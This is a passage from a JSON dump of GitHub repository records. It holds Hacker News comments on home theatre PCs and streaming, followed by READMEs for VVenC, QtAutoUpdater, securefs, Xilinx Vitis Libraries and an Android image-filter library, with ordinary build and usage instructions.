Video output from my few boxes were fed back into NTSC modulators; I added extra channels to the CATV distribution and could tune into my TV, music, music video, and movie library from any TV. Basically I built a mini VoD system in my house. I tried to keep this up into later years to little success using gradually more purpose built hardware. I think the dream finally died for me after my Dune HD gave up the ghost.I started an Internet radio business in 1998 so this actually predated my involvement in the HTPC stuff. We programmed several genre stations of our own, properly and legally and built audio encoding appliances that we would sell as a simulcasting service to traditional broadcast stations. Even though we were operating legally and paying licensing, we eventually got killed by the Metallica v Napster suit which prompted the licensing agencies to retool their fees and prompted commercial broadcasters at the time to put a hold on all Internet streaming.Everything in one place is what customers want, but the businesses that own the stuff want customer attention and lock in. Why anyone would want to dedicate their career to enforcing this attitude for a giant multinational corporation is beyond me. This idiocy is the reason the youtube mobile app doesnt let you watch video in the background and hides the clock, for instance. It's untenable. Ultimately I gave up on the whole mess. I still own some TVs, but these days they are mostly off. I don't have the stomach for it.The music services fortunately have mostly figured it out: there are a number of places where you can choose to either select and purchase from or subscribe in bulk to \"nearly all the commercially distributed music there is\" for a fee commiserate with your desire to either buy the product or be the product. For video, it's alphabet shit soup.I started back in the Windows XP Media Center days. Now I've settled on a simpler setup, using Plex on a PC, and the built-in apps on my smart-TV.Ha, yes. I purchased an ATI TV Wonder Digital Cable Tuner[1] in 2010 and hooked it up to my custom built HTPC running Windows 8 PC Media Center edition so I can use it as my DVR. I watched TV like that for 8 years and enjoyed every minute of it. I even developed a Windows Media Center app in MCML[2] that allowed you to access streaming sporting events on ESPN[3].[1] https://www.cnet.com/products/ati-tv-wonder-digital-cable-tu...[2] https://docs.microsoft.com/en-us/previous-versions/windows/d...[3] https://www.amarkota.com/portfolio/espn3...ah yes...countless hours were spent on my MythBox, which mostly worked. Before my MythBox went out the door, it had four TV cards a couple of huge drives and a ton of memory. It was a very nice machine. Before that, I used the XBMC on a couple of Xboxes. I remember using Splinter Cell and a memory card, I think, to perform the hack to get it going. That was a lot of fun.Fast forward to today, I was using a a little single board computer (le potato) to run Kodi. That worked okay but always required hacking to get it working with Netflix or other services. I finally gave up and bought the Nvidia Shield Pro. It works great and I haven't had a single (major) issue since buying it. It runs Android TV and allows me to install Kodi as an app. I still run Kodi along with many of the other apps. No longer do I have to run into the room and ssh into the box to get it to do something.While I am happy with the Nvidia Shield, in my heart, I feel like I gave up some freedom. 
The early days of HTPC were about figuring out how to make things work without the infrustructure of any big companies (other than the $19.99/year I paid to schedulesdirect!). Just a community of people making things work they way they wanted them to work. Yep. I am a sell out (that is watching tv with a knowing smile on his face).Helped a buddy who wanted to sell a HTPC box, based on a mini-ITX board in a neat small case. The motherboard he'd picked had IR remote support, and it would be running XBMC.Main problem was mainly price, as it often is. No way it could have approached the price of my NVIDIA Shield TV box.But he did make a few and sold it to people he knew.I helped him automate the Linux install and setup, so he could just drop a txt file with owner details and the image on a USB stick and boot from it to install a new box. This became my first exposure to XBMC, which I liked quite a lot.I am mostly disappointed where this all ended up, especially with Netflix. The HTPC movement was all about serving up our bought content at top quality. Nowadays you don't own any content, you rent it all and its all streamed at poor bitrate with often worse audio options than what we had 20 years ago. Netflix instead of freeing existing content and spreading it across the globe ended up copying the cable company production of its own content and isolating that content to its own platform model to be sold with a monthly rental along with all its other content you don't want.Very little of what the early HTPC movement and Jellyfin/Kodi are today has made it into the official streaming services and its every bit as geolocked as cable services were. Netflix is cable on the internet, none of the devices today are anything but multiple cable devices served over the internet, they share very little in principles with the early HTPC movement. DRM has become ever more prevalent in TV and movies not less.Hello F.B.I.,Nice try.Sincerely,Guy who owns alot of DVDsWhy not just hit mute and watch the closed captions. 
What sounds from a soccer game do you actually want to hear?", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "fraunhoferhhi/vvenc", "link": "https://github.com/fraunhoferhhi/vvenc", "tags": ["encoder", "vvc", "video", "codec", "h266"], "stars": 644, "description": "Fraunhofer Versatile Video Encoder (VVenC)", "lang": "C++", "repo_lang": "", "readme": "# Fraunhofer Versatile Video Encoder (VVenC)\n\nThe Fraunhofer Versatile Video Encoder (VVenC) is a fast and efficient H.266/VVC encoder implementation with the following main features:\n- Easy to use encoder implementation with five predefined quality/speed presets;\n- Perceptual optimization to improve subjective video quality, based on the XPSNR visual model;\n- Extensive frame-level and task-based parallelization with very good scaling;\n- Frame-level single-pass and two-pass rate control supporting variable bit-rate (VBR) encoding;\n- Expert mode encoder interface available, allowing fine-grained control of the encoding process.\n\n## Information\n\nSee the [Wiki-Page](https://github.com/fraunhoferhhi/vvenc/wiki) for more information:\n\n* [Build information](https://github.com/fraunhoferhhi/vvenc/wiki/Build)\n* [Usage documentation](https://github.com/fraunhoferhhi/vvenc/wiki/Usage)\n* [VVenC performance](https://github.com/fraunhoferhhi/vvenc/wiki/Encoder-Performance)\n* [License](https://github.com/fraunhoferhhi/vvenc/wiki/License)\n* [Publications](https://github.com/fraunhoferhhi/vvenc/wiki/Publications)\n* [Version history](https://github.com/fraunhoferhhi/vvenc/wiki/Changelog)\n\n## Build\n\nVVenC uses CMake to describe and manage the build process. A working [CMake](https://cmake.org/) installation is required to build the software. In the following, the basic build steps are described. Please refer to the [Wiki](https://github.com/fraunhoferhhi/vvenc/wiki/Build) for the description of all build options.\n\n### How to build using CMake?\n\nTo build using CMake, create a `build` directory and generate the project:\n\n```sh\nmkdir build\ncd build\ncmake .. \n```\n\nTo actually build the project, run the following after completing project generation:\n\n```sh\ncmake --build .\n```\n\nFor multi-configuration projects (e.g. Visual Studio or Xcode) specify `--config Release` to build the release configuration.\n\n### How to build using GNU Make?\n\nOn top of the CMake build system, a convenience Makefile is provided to simplify the build process. To build using GNU Make, please run the following:\n\n```sh\nmake install-release \n```\n\nOther supported build targets include `configure`, `release`, `debug`, `relwithdebinfo`, `test`, and `clean`. Refer to the Wiki for a full list of supported features.\n\n## Citing\n\nPlease use the following citation when referencing VVenC in literature:\n\n```bibtex\n@InProceedings{VVenC,\n author = {Wieckowski, Adam and Brandenburg, Jens and Hinz, Tobias and Bartnik, Christian and George, Valeri and Hege, Gabriel and Helmrich, Christian and Henkel, Anastasia and Lehmann, Christian and Stoffers, Christian and Zupancic, Ivan and Bross, Benjamin and Marpe, Detlev},\n booktitle = {Proc. IEEE International Conference on Multimedia Expo Workshops (ICMEW)},\n date = {2021},\n title = {VVenC: An Open And Optimized VVC Encoder Implementation},\n doi = {10.1109/ICMEW53276.2021.9455944},\n pages = {1-2},\n}\n```\n\n## Contributing\n\nFeel free to contribute. 
To do so:\n\n* Fork the current state of the master branch\n* Apply the desired changes\n* Add your name to [AUTHORS.md](./AUTHORS.md)\n* Create a pull request to the upstream repository\n\n## License\n\nPlease see the [LICENSE.txt](./LICENSE.txt) file for the terms of use of the contents of this repository.\n\nFor more information, please contact: vvc@hhi.fraunhofer.de\n\n**Copyright (c) 2019-2023, Fraunhofer-Gesellschaft zur F\u00f6rderung der angewandten Forschung e.V. & The VVenC Authors.**\n\n**All rights reserved.**\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "Skycoder42/QtAutoUpdater", "link": "https://github.com/Skycoder42/QtAutoUpdater", "tags": ["qt", "module", "updater", "gui-library", "automatic"], "stars": 644, "description": "A Qt library to automatically check for updates and install them", "lang": "C++", "repo_lang": "", "readme": "# QtAutoUpdater\n\nThe Qt auto updater library automatically checks for updates and installs them, based on various backends. This repository includes:\n\n - A library with the basic updater (without any GUI)\n - An automated Widgets GUI\n - An automated Quick GUI\n\n[![Travis Build Status](https://travis-ci.org/Skycoder42/QtAutoUpdater.svg?branch=master)](https://travis-ci.org/Skycoder42/QtAutoUpdater)\n[![Appveyor Build status](https://ci.appveyor.com/api/projects/status/5iw2byrvnsdfytxv/branch/master?svg=true)](https://ci.appveyor.com/project/Skycoder42/qtautoupdater/branch/master)\n[![Codacy Badge](https://api.codacy.com/project/badge/Grade/a5b2e3cc66c644869515d2f3a5c3ff49)](https://www.codacy.com/app/Skycoder42/QtAutoUpdater)\n\n> The library was recently updated to version 3.0. That release differs strongly from 2.1. Use the [Porting Guide](porting_guide.md) to get your application from 2.1 to 3.0!\n\n## Features\n### Core Library\n- Automatic check for updates\n- Install updates in parallel or after exit\n- Simple update scheduling mechanism for the running instance\n- Currently 7 different backends are supported:\n\t- [Qt Installer Framework](https://doc.qt.io/qtinstallerframework/index.html) (for cross-platform desktop)\n\t- [PackageKit](https://www.freedesktop.org/software/PackageKit/) (works with most Linux package managers)\n\t- [Chocolatey](https://chocolatey.org/) (a package manager for Windows)\n\t- [Homebrew](https://brew.sh/) (a package manager for macOS)\n\t- [Google Playstore](https://play.google.com/store) (for Android apps)\n\t- A custom backend that checks for updates based on an HTTP request and can download and execute any update tool\n\n### GUI Libraries\n- Applies to both the widgets and the quick GUI\n- Automated classes that show dialogs etc. based on a configuration and guide the user through the update process\n - customizable: you can decide what to show\n - extended information dialog or simple dialog to show basic information about the update\n- A custom menu action and button for easy integration into the GUI\n- *Prepared* for translation and fully translated for:\n\t- German\n\t- French\n\t- Spanish (outdated)\n\t- Arabic\n\n#### Screenshots\nHere are some sample screenshots of the GUI (the rocket of the information dialog is the \"application icon\" and depends on your application). These are various parts of the GUI in various different styles. 
The first row shows elements from the widgets module, the second from the quick module.\n\n Element\t\t\t| Widgets Screenshots\t\t\t\t\t\t\t\t| Quick Screenshots\n--------------------|---------------------------------------------------|-------------------\n Progress Dialog\t| ![macOs Style](./doc/images/mac_progress.png)\t\t| ![Default Style](./doc/images/default_progress.png)\n Information Dialog\t| ![Windows Style](./doc/images/win_info.png)\t\t| ![Material Style](./doc/images/material_info.png)\n Update Button\t\t| ![Fusion Style](./doc/images/fusion_button.png)\t| ![Imagine Style](./doc/images/imagine_button.png)\n Install Wizard\t\t| ![KDE Style](./doc/images/kde_installer.png)\t\t| ![Universal Style](./doc/images/universal_installer.png)\n\n## Requirements\n- The core library only depends on QtCore\n- The widgets library only depends on QtWidgets\n- The quick library requires Qt Quick Controls 2\n- The plugins have different requirements, typically the package managers and/or libraries associated with that plugin\n\n## Download/Installation\nThere are multiple ways to install the Qt module, sorted by preference:\n\n1. Package Managers: The library is available via:\n\t- **Arch-Linux:** AUR-Repository: [`qt5-autoupdater`](https://aur.archlinux.org/packages/qt5-autoupdater/)\n\t- **macOS:**\n\t\t- Tap: [`brew tap Skycoder42/qt-modules`](https://github.com/Skycoder42/homebrew-qt-modules)\n\t\t- Package: `qtautoupdater`\n\t\t- **IMPORTANT:** Due to limitations of homebrew, you must run `source /usr/local/opt/qtautoupdater/bashrc.sh` before you can use the module.\n2. Simply add my repository to your Qt MaintenanceTool (Image-based How-To here: [Add custom repository](https://github.com/Skycoder42/QtModules/blob/master/README.md#add-my-repositories-to-qt-maintenancetool)):\n\t1. Start the MaintenanceTool from the command line using `/path/to/MaintenanceTool --addRepository ` with one of the following URLs (alternatively, you can add it via the GUI, as shown in the how-to linked above):\n\t\t- On Linux: https://install.skycoder42.de/qtmodules/linux_x64\n\t\t- On Windows: https://install.skycoder42.de/qtmodules/windows_x86\n\t\t- On Mac: https://install.skycoder42.de/qtmodules/mac_x64\n\t2. A new entry appears under all supported Qt Versions (e.g. `Qt > Qt 5.13 > Skycoder42 Qt modules`)\n\t3. You can install either all of my modules, or select the one you need: `Qt Autoupdater`\n\t4. Continue the setup and that's it! You can now use the module for all of your installed Kits for that Qt\n3. Download the compiled modules from the release page. **Note:** You will have to add the correct ones yourself and may need to adjust some paths to fit your installation!\n4. Build it yourself! **Note:** This requires perl to be installed. If you don't have/need cmake, you can ignore the related warnings. To automatically build and install to your Qt installation, run:\n\t- Install and prepare [qdep](https://github.com/Skycoder42/qdep#installation)\n\t- Install any potential dependencies for the plugins you need\n\t- Download the sources. Either use `git clone` or download from the releases. If you choose the second option, you have to manually create a folder named `.git` in the project's root directory, otherwise the build will fail.\n\t- `qmake`\n\t- `make` (If you want the tests/examples/etc., run `make all`)\n\t- Optional steps:\n\t\t- `make doxygen` to generate the documentation\n\t\t- `make -j1 run-tests` to build and run all tests\n\t- `make install`\n\n\n## Usage\nThe autoupdater is provided as a Qt module. 
Thus, all you have to do is add the module, and then, in your project, add `QT += autoupdatercore` or `QT += autoupdaterwidgets` to your .pro file - depending on what you need! For QML, you can import the library as `de.skycoder42.QtAutoUpdater.Core` and `de.skycoder42.QtAutoUpdater.Quick`.\n\n**Note:** When preparing an application for the release, the `windeployqt` and `macdeployqt` tools will *not* include the plugins! You have to manually copy matching libraries from `/updaters`. The `d` suffix is used on Windows and the `_debug` suffix on macOS for the debug version of the plugins.\n\n### Getting started\nThe following examples assume you are using the Qt Installer Framework as backend. The usage is similar for all backends, as you only have to adjust the configuration. This document expects you to already know the installation system you are using. If you are new to all of this, I personally recommend the Qt Installer Framework. It is relatively easy to use and works for Linux, Windows and macOS.\n\nHere are some links that will explain how to create an online-installer using the QtIFW framework. Once you have figured out how to do that, it's only a small step to the updater library:\n - [QtIFW - Tutorial: Creating an Installer](https://doc.qt.io/qtinstallerframework/ifw-tutorial.html): Check this to learn how to create an installer in general. Don't be afraid, it's a very short tutorial\n - [QtIFW - Creating Online Installers](https://doc.qt.io/qtinstallerframework/ifw-online-installers.html): This page will tell you how to create an online installer from your offline installer - in just 2 steps\n - [QtIFW - Promoting Updates](https://doc.qt.io/qtinstallerframework/ifw-updates.html): And this site explains how to create updates\n\n### Examples\nSince this library requires the maintenancetool that is deployed with every Qt Installer Framework installation, the examples cannot be tested without a maintenancetool! If you intend to recreate this example, set the path to the `MaintenanceTool` that is deployed with the installation of Qt (or any other maintenancetool). So make sure to adjust the path if you try to run the examples.\n\n#### Updater\nThe following example shows the basic usage of the updater. Only the core library is required for this example. It creates a new updater instance that is connected to the maintenancetool located at \"C:/Qt/MaintenanceTool\". As soon as the application starts, it will check for updates and print the update result. If updates are available, their details will be printed and the maintenancetool is scheduled to start on exit. 
In both cases, the application will quit afterwards.\n\n```cpp\n#include <QCoreApplication>\n#include <QDebug>\n#include <QtAutoUpdaterCore/Updater> // assumed module-style include; adjust to your setup\n\nint main(int argc, char *argv[])\n{\n\tQCoreApplication a{argc, argv};\n\t//create the updater with the application as parent -> will live long enough to start the tool on exit\n\tauto updater = QtAutoUpdater::Updater::create(\"qtifw\", {\n\t\t{\"path\", \"C:/Qt/MaintenanceTool\"} //.exe or .app is automatically added on the platform\n\t}, &a);\n\n\tQObject::connect(updater, &QtAutoUpdater::Updater::checkUpdatesDone, [updater](QtAutoUpdater::Updater::State state) {\n\t\tqDebug() << \"Update result:\" << state;\n\t\tif (state == QtAutoUpdater::Updater::State::NewUpdates) {\n\t\t\t//As soon as the application quits, the maintenancetool will be started in update mode\n\t\t\tqDebug() << \"Update info:\" << updater->updateInfo();\n\t\t\tupdater->runUpdater();\n\t\t}\n\t\t//Quit the application\n\t\tqApp->quit();\n\t});\n\n\t//start the update check\n\tupdater->checkForUpdates();\n\treturn a.exec();\n}\n```\n\n#### UpdateController (QtWidgets)\nThis example will show you the full dialog flow of the update controller, which is used by the widgets library to control the update GUI flow. Since there is no main window in this example, you will only see the controller dialogs. Please note that you can control how much of that dialog set will be shown to the user. This example is *reduced*! For a full example with all parts of the controller, check the `examples/autoupdatergui/WidgetsUpdater` application.\n\n```cpp\n#include <QApplication>\n#include <QtAutoUpdaterWidgets/UpdateController> // assumed module-style include; adjust to your setup\n\nint main(int argc, char *argv[])\n{\n\tQApplication a{argc, argv};\n\t//Since there is no main window, the various dialogs should not quit the app\n\tQApplication::setQuitOnLastWindowClosed(false);\n\t//first create an updater as usual\n\tauto updater = QtAutoUpdater::Updater::create(...);\n\t//then create the update controller with the application as parent -> will live long enough to start the tool on exit\n\t//since there is no parent window, all dialogs will be top-level windows\n\tauto controller = new QtAutoUpdater::UpdateController{updater, &a};\n\t//start the update check -> AskLevel to give the user maximum control\n\tcontroller->start(QtAutoUpdater::UpdateController::DisplayLevel::Ask);\n\treturn a.exec();\n}\n```\n\n#### Quick GUI\nUnlike the widgets variant, in Quick you simply place all the components you want to be shown and attach them to an updater. The flow is created automatically, since all the components know when to show up. It was designed differently, as QML follows a declarative approach. The following shows a basic QML-based GUI using simple dialogs. This example is *reduced*! 
For a full example with all parts of the controller, check the `examples/autoupdaterquick/QuickUpdater` application.\n\n```qml\nimport QtQuick.Controls 2.5 // needed for ApplicationWindow; exact version is an assumption\nimport de.skycoder42.QtAutoUpdater.Core 3.0\nimport de.skycoder42.QtAutoUpdater.Quick 3.0\n\nApplicationWindow {\n\tvisible: true\n\twidth: 360\n\theight: 600\n\ttitle: qsTr(\"Hello World\")\n\n\t// Create the updater, just as you would in cpp\n\tproperty Updater globalUpdater: QtAutoUpdater.createUpdater(...)\n\n\t// the button to start the update check\n\tUpdateButton {\n\t\tanchors.centerIn: parent\n\t\tupdater: globalUpdater\n\t}\n\n\t// dialog to show the check progress\n\tProgressDialog {\n\t\tupdater: globalUpdater\n\t}\n\n\t// dialog to show the update result\n\tUpdateResultDialog {\n\t\tupdater: globalUpdater\n\t\tautoRunUpdater: true\n\t}\n}\n```\n\n## Documentation\nThe documentation is available on [GitHub Pages](https://skycoder42.github.io/QtAutoUpdater/). It was created using [doxygen](http://www.doxygen.org/). The HTML documentation and Qt Help files are shipped together with the module for both the custom repository and the package on the release page. Please note that doxygen docs do not perfectly integrate with QtCreator/QtAssistant.\n\n## Translations\nThe core library does not need any translation, because it won't show anything to the user. The GUI libraries, however, do. The project is prepared for translation. Only a few translations are provided. However, you can easily create the translations yourself. The file `src/translations/qtautoupdater_template.ts` is a ready-made TS file. Just rename it (e.g. to `qtautoupdater_jp.ts`) and open it with Qt Linguist to create the translations.\n\n### Contributed translations:\n- French by [@aalex420](https://github.com/aalex420)\n- Spanish by [@checor](https://github.com/checor)\n- Arabic by [@abdullah-radwan](https://github.com/abdullah-radwan)\n\n## Icon sources/Links\n- [FatCow Free Icons](https://www.fatcow.com/free-icons)\n- [Icons - Material Design](https://material.io/resources/icons/?style=outline)\n- [IconArchive](http://www.iconarchive.com/)\n- http://www.ajaxload.info/\n\n### Test Project\n - http://www.oxygen-icons.org/\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "netheril96/securefs", "link": "https://github.com/netheril96/securefs", "tags": ["filesystem", "cloud", "cryptography", "crypto", "fuse", "fuse-filesystem", "authentication", "encryption", "filesystems", "security"], "stars": 644, "description": "Filesystem in userspace (FUSE) with transparent authenticated encryption", "lang": "C++", "repo_lang": "", "readme": "# securefs\n\n`securefs` is a filesystem in userspace (FUSE) with transparent encryption (when writing) and decryption (when reading).\n\n`securefs` mounts a regular directory onto a mount point. The mount point appears as a regular filesystem, where one can read/write/create files, directories and symbolic links. The underlying directory will be automatically updated to contain the encrypted and authenticated contents.\n\n## Motivation\n\nFrom sensitive financial records to personal diaries and collections of guilty pleasures, we all have something to keep private from prying eyes. Especially when we store our files in the cloud, the company and the NSA may well get their hands upon it. 
The best protection we can afford ourselves is **cryptography**, the discipline originally developed by mathematicians and the military to keep national secrets.\n\nSecurity, however, is often at odds with convenience, and people easily grow tired of the hassle and revert to no protection at all. Consider the case of protecting our files either locally or in the cloud: we have to encrypt the files before committing them to the cloud and decrypt them every time we need to read and write. Worse still, such actions leave unencrypted traces on our hard drive. If we store data in the cloud, another issue arises: manual encryption and decryption prevent files from being synced efficiently.\n\n`securefs` is intended to make the experience as smooth as possible so that security and convenience do not conflict. After mounting the virtual filesystem, everything just works™.\n\n## Comparison\n\nThere are already many encrypting filesystems in widespread use. Some notable ones are TrueCrypt, FileVault, BitLocker, eCryptFS, encfs and gocryptfs. `securefs` differs from them in that it is the only one with all of the following features:\n\n- [Authenticated encryption](https://en.wikipedia.org/wiki/Authenticated_encryption) (hence secure against chosen ciphertext attacks)\n- [Probabilistic encryption](https://en.wikipedia.org/wiki/Probabilistic_encryption) (hence provides semantic security)\n- Supported on all major platforms (Mac, Linux, BSDs and Windows)\n- Efficient cloud synchronization (not a single preallocated file as container)\n- (Optional) File size obfuscation by random padding.\n\n## Install\n\n[![Actions Status](https://github.com/netheril96/securefs/workflows/C%2FC%2B%2B%20CI/badge.svg)](https://github.com/netheril96/securefs/actions)\n\n### macOS\n\nInstall with [Homebrew](https://brew.sh). [macFUSE](https://osxfuse.github.io) has to be installed beforehand.\n\n```\nbrew install netheril96/fuse/securefs\n```\n\n### Windows\n\nWindows users can download a prebuilt package from the releases section. It depends on [WinFsp](https://github.com/billziss-gh/winfsp/releases) and the [VC++ 2017 redistributable package](https://support.microsoft.com/en-us/help/2977003/the-latest-supported-visual-c-downloads).\n\nOn Windows, you should encrypt the pagefile to avoid leaking sensitive data on disk. Run with admin privileges with the command `fsutil behavior set EncryptPagingFile 1` before mounting a volume with `securefs`.\n\n### Linux\n\nLinux users have to build it from source.\n\nFirst `fuse` must be installed.\n\n- On Debian-based Linux distros, `sudo apt-get install fuse libfuse-dev build-essential cmake python3`.\n- On RPM-based Linux, `sudo yum install fuse fuse-devel python3`.\n\nThen clone the sources with `git clone --recursive`, and execute `linux-build.sh`.\n\n### FreeBSD (unofficial)\n\nInstall using packages (recommended):\n\n```bash\npkg install fusefs-securefs\n```\n\nor ports:\n\n```bash\nmake -C /usr/ports/sysutils/fusefs-securefs install\n```\n\nMake sure you load the fuse kernel module before using securefs:\n\n```bash\nkldload fuse\nsysrc -f /boot/loader.conf fuse_load=\"YES\" # Load fuse automatically at boot\n```\n\n## Basic usage\n\n_It is recommended to disable or encrypt the swap and hibernation file. 
Otherwise plaintext and keys stored in main memory may be written to disk by the OS at any time._\n\nExamples:\n\n```bash\nsecurefs --help\nsecurefs create ~/Secret\nsecurefs chpass ~/Secret\nsecurefs mount ~/Secret ~/Mount # press Ctrl-C to unmount\nsecurefs m -h # m is an alias for mount, -h tells you all the flags\n```\n\n## Lite and full mode\n\nThere are two categories of filesystem format.\n\nThe **lite** format simply encrypts filenames and file contents separately, similar to how `encfs` operates, although with more security.\n\nThe **full** format maps files, directories and symlinks in the virtual filesystem all to regular files in the underlying filesystem. The directory structure is flattened and recorded as B-trees in files.\n\nThe lite format has become the default on Unix-like operating systems as it is much faster and features easier conflict resolution, especially when used with Dropbox, Google Drive, etc. The full format, however, leaks less information about the filesystem hierarchy, runs relatively independently of the features of the underlying filesystem, and is in general more secure.\n\nTo request the full format, which is no longer the default, run `securefs create --format 2`.\n\n## Design and algorithms\n\nSee [here](docs/design.md).\n\n## Caveat\n\nIf you store `securefs` encrypted files on iCloud Drive, it might cause Spotlight Search on iOS to stop working. It is a bug in iOS, not in `securefs`.\n\nTo work around that bug, you can disable the indexing of the _Files_ app in Settings -> Siri & Suggestions.\n", "readme_type": "markdown", "hn_comments": "This is something I wish I implemented as a hobby project but never found the time to do it. Congrats! I see you implement a directory as a file containing a b-tree. Could you provide more info on this?", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "Xilinx/Vitis_Libraries", "link": "https://github.com/Xilinx/Vitis_Libraries", "tags": [], "stars": 644, "description": "Vitis Libraries", "lang": "C++", "repo_lang": "", "readme": "# Vitis Accelerated Libraries\n[Vitis™ Unified Software Platform](https://www.xilinx.com/products/design-tools/vitis/vitis-platform.html) includes an extensive set of open-source, performance-optimized libraries that offer out-of-the-box acceleration with minimal to zero-code changes to your existing applications.\n\n[Comprehensive documentation](https://docs.xilinx.com/r/en-US/Vitis_Libraries/index.html)\n\n* Common Vitis accelerated-libraries for Math, Statistics, Linear Algebra, and DSP offer a set of core functionality for a wide range of diverse applications.\n* Domain-specific Vitis accelerated libraries offer out-of-the-box acceleration for workloads like Vision and Image Processing, Quantitative Finance, Database, and Data Analytics, Data Compression and more.\n* Leverage the rich, growing ecosystem of partner-accelerated libraries, framework plug-ins, and accelerated applications to hit the ground running and accelerate your path to production.\n\n![Comprehensive Set of Domain-Specific Accelerated Libraries](https://xilinx.github.io/Vitis_Libraries/_images/1569434411715.png)\n\n# Use in Familiar Programming Languages\nUse Vitis accelerated-libraries in commonly used programming languages that you know, like C, C++, and Python. 
Leverage Xilinx platforms as an enabler in your applications \u2013 work at an application level and focus your core competencies on solving challenging problems in your domain, accelerate time to insight, and innovate.\n\nWhether you want to accelerate portions of your existing x86 host application code or want to develop accelerators for deployment on Xilinx embedded platforms, calling a Vitis accelerated-library API or kernel in your code offers the same level of abstraction as any software library.\n\n![Programming Languages](https://xilinx.github.io/Vitis_Libraries/_images/1569434541001.png)\n\n# Scalable and Flexible\n\nVitis accelerated-libraries are accessible to all developers through GitHub and scalable across all Xilinx platforms. Develop your applications using these optimized libraries and seamlessly deploy across Xilinx platforms at the edge, on-premise or in the cloud without having to reimplement your accelerated application.\n\nFor rapid prototyping and quick evaluation of the benefits Xilinx can bring to your applications, you can use them as plug-and-play accelerators, called directly as an API in the user application for several workloads like Computer Vision and Image Processing, Quantitative Finance, Database, and Data Analytics among others.\n\n![Scalable and Flexible](https://xilinx.github.io/Vitis_Libraries/_images/1569434644122.png)\n\nTo design custom accelerators for your application, use Vitis library functions as optimized algorithmic building blocks, modify them to suit your specific needs, or use them as a reference to completely design your own. Choose the flexibility you need!\n\nCombine domain-specific Vitis libraries with pre-optimized deep learning models from the Vitis AI library or the Vitis AI development kit to accelerate your whole application and meet the overall system-level functionality and performance goals.\n\n![Scalable and Flexible Library Functions](https://xilinx.github.io/Vitis_Libraries/_images/1568760747007.png)\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "ragnraok/android-image-filter", "link": "https://github.com/ragnraok/android-image-filter", "tags": [], "stars": 643, "description": "some android image filters", "lang": "C++", "repo_lang": "", "readme": "android-image-filter\n====================\n\nsome android image filters\n\nIn some filters, I use the NDK for the implementation to make them more efficient\n\n# Setup\n\n- Install Android NDK and properly configure it: [http://goo.gl/koTCb](http://goo.gl/koTCb)\n- Get a clean clone of this project, import the library in Android Studio\n- Then Clean and Build the whole project to regenerate the library\n- Then just add the library module as a dependency to your existing project.\n\n# How to Use it\nIt is dead simple; you can see the magic in the following code:\n\n```Java\n Bitmap newBitmap = BitmapFilter.changeStyle(originBitmap, BitmapFilter.BLUR_STYLE);\n imageView.setImageBitmap(newBitmap); \n```\n\nThere are also some options for each filter; you can check the demo to see how to use these options to customize your filter effect\n\nYou can see all filters in [BitmapFilter.java][3], which currently contains 19 kinds of filters. Here is the list of filters and their options (shown in code):\n\n* Grayscale\n* Relief\n* Blur(Average Smooth)\n\n\t```Java\n\tBitmapFilter.changeStyle(originBitmap, BitmapFilter.BLUR_STYLE, maskSize);\n\t```\n\t\n``maskSize`` is an integer indicating the average blur mask's 
size\n\t\n* Oil Painting\n* Neon\n\t\n\t```Java\n\tBitmapFilter.changeStyle(originBitmap, BitmapFilter.NEON_STYLE, \n\tneon_color_R, neon_color_G, neon_color_B);\t\n\t```\n\n``neon_color_R``, ``neon_color_G``, ``neon_color_B`` are integers for the R, G, B components\n\t\n* Pixelate\n\t\n\t```Java \n\tBitmapFilter.changeStyle(originBitmap, BitmapFilter.PIXELATE_STYLE, pixelSize);\n\t```\n\t\n``pixelSize`` is an integer, the pixel size for this filter\n\t\n* Old TV\n* Invert Color\n* Block\n* Old Photo\n* Sharpen(By Laplacian)\n* Light\n\t\n\t```Java \n\tBitmapFilter.changeStyle(originBitmap, BitmapFilter.LIGHT_STYLE, light_center_x, light_center_y, light_radius);\n\t```\n\t\n``light_center_x``, ``light_center_y`` are integers indicating the center of the light spot (the origin is in the upper-left corner), and ``light_radius`` indicates the radius of the light spot, in pixels\n\n* Lomo\n\t\n\t```Java\n\tBitmapFilter.changeStyle(originBitmap, BitmapFilter.LOMO_STYLE, roundRadius);\n\t```\n\n``roundRadius`` is a double, the radius of the black circle in the effect\n\n* HDR\n* Gaussian Blur\n\n\t```Java\n\tBitmapFilter.changeStyle(originBitmap, BitmapFilter.GAUSSIAN_BLUR_STYLE, sigma);\n\t```\n\t\n\t``sigma`` is a double, the sigma value in Gaussian Blur; the bigger the sigma, the smoother the result image\n\n* Soft Glow\n\n\t```Java\n\tBitmapFilter.changeStyle(originBitmap, BitmapFilter.SOFT_GLOW_STYLE, sigma);\n\t```\n\t\n\t``sigma`` is a double, the same as ``sigma`` in Gaussian Blur, indicating the sigma value used in the Gaussian Blur step of Soft Glow\n\n* Sketch\n* Motion Blur\n\n\t```Java\n\tBitmapFilter.changeStyle(originBitmap, BitmapFilter.MOTION_BLUR_STYLE, xSpeed, ySpeed);\n\t```\n\t``xSpeed`` and ``ySpeed`` are both integers, indicating the speed along the x-axis and y-axis (the origin is in the upper-left corner)\n\n* Gotham\n\nPS: all options have default values, so you can just select the effect and pass nothing, like this:\n\n```Java\nBitmapFilter.changeStyle(originBitmap, BitmapFilter.MOTION_BLUR_STYLE);\n```\n\n\nIf you have any questions, please open an [issue][4] and show your code and the program output, thanks!\n\n ![][2]\n \n# The MIT License (MIT)\n\nCopyright (c) \\<2012-2016\\> \\\n\nPermission is hereby granted, free of charge, to any person obtaining a copy\nof this software and associated documentation files (the \"Software\"), to deal\nin the Software without restriction, including without limitation the rights\nto use, copy, modify, merge, publish, distribute, sublicense, and/or sell\ncopies of the Software, and to permit persons to whom the Software is\nfurnished to do so, subject to the following conditions:\n\nThe above copyright notice and this permission notice shall be included in\nall copies or substantial portions of the Software.\n\nTHE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\nIMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\nFITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. 
